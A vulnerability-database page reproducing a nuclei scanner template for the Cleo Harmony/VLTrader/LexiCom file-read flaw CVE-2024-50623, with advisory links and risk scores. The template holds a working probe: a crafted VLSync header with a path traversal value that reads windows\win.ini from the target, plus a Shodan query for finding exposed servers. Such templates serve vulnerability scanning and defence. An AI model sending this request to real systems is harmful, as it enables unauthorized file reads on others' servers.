Lucene search

K

Cleo Harmony < 5.8.0.21 - Arbitary File Read

πŸ—“οΈΒ 11 Dec 2024Β 16:28:43Reported byΒ ProjectDiscoveryTypeΒ 
nuclei
Β nuclei
πŸ”—Β github.comπŸ‘Β 36Β Views

Cleo Harmony versions < 5.8.0.21 allow arbitrary file read leading to remote code execution.

Show more
Related
Refs
Code
ReporterTitlePublishedViews
Family
AttackerKB
CVE-2024-50623
28 Oct 202400:00
–attackerkb
AttackerKB
CVE-2024-55956
13 Dec 202400:00
–attackerkb
NVD
CVE-2024-50623
28 Oct 202400:15
–nvd
Rapid7 Blog
Modular Java Backdoor Dropped in Cleo Exploitation Campaign
11 Dec 202418:44
–rapid7blog
Rapid7 Blog
What’s New in Rapid7 Products & Services: Q4 2024 in Review
18 Dec 202414:00
–rapid7blog
Rapid7 Blog
Widespread Exploitation of Cleo File Transfer Software (CVE-2024-55956)
10 Dec 202414:04
–rapid7blog
Rapid7 Blog
Metasploit Wrap-Up 01/17/2025
17 Jan 202519:22
–rapid7blog
Cvelist
CVE-2024-50623
27 Oct 202400:00
–cvelist
Vulnrichment
CVE-2024-50623
27 Oct 202400:00
–vulnrichment
GithubExploit
Exploit for Unrestricted Upload of File with Dangerous Type in Cleo Harmony
23 Dec 202408:52
–githubexploit
Rows per page
id: CVE-2024-50623

info:
  name: Cleo Harmony < 5.8.0.21 - Arbitary File Read
  author: DhiyaneshDK
  severity: high
  description: |
    In Cleo Harmony before 5.8.0.21, VLTrader before 5.8.0.21, and LexiCom before 5.8.0.21, there is an unrestricted file upload and download that could lead to remote code execution.
  reference:
    - https://support.cleo.com/hc/en-us/articles/27140294267799-Cleo-Product-Security-Advisory
    - https://github.com/watchtowrlabs/CVE-2024-50623
    - https://labs.watchtowr.com/cleo-cve-2024-50623/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-50623
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2024-50623
    cwe-id: CWE-434
    epss-score: 0.00043
    epss-percentile: 0.10702
  metadata:
    verified: true
    max-request: 2
    shodan-query: 'Server: Cleo'
  tags: cve,cve2024,cleo,vltrader,lexicom,harmony,lfi

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /Synchronization HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(tolower(response), "cleo")'
        internal: true

    extractors:
      - type: regex
        name: version
        part: header
        group: 1
        regex:
          - "Server: Cleo.*?/([0-9.]+)"
        internal: true

  - raw:
      - |
        GET /Synchronization HTTP/1.1
        Host: {{Hostname}}
        VLSync: Retrieve;l=Ab1234-RQ0258;n=VLTrader;v={{version}};a=1337;po=5080;s=True;b=False;pp=myEncryptedPassphrase;path=..\..\..\windows\win.ini

    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# digest: 4a0a00473045022100d64a0863b7a23d59ac84e789af0e70eb546f03e14e9b03dd3080c4f5f2470cbf02203847de51792a964e44744eddf1bc2b2fb0a8eb69dd1e1805b504197d5a277d76:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
11 Dec 2024 16:43Current
7.6High risk
Vulners AI Score7.6
CVSS39.8
EPSS0.969
36
.json
Report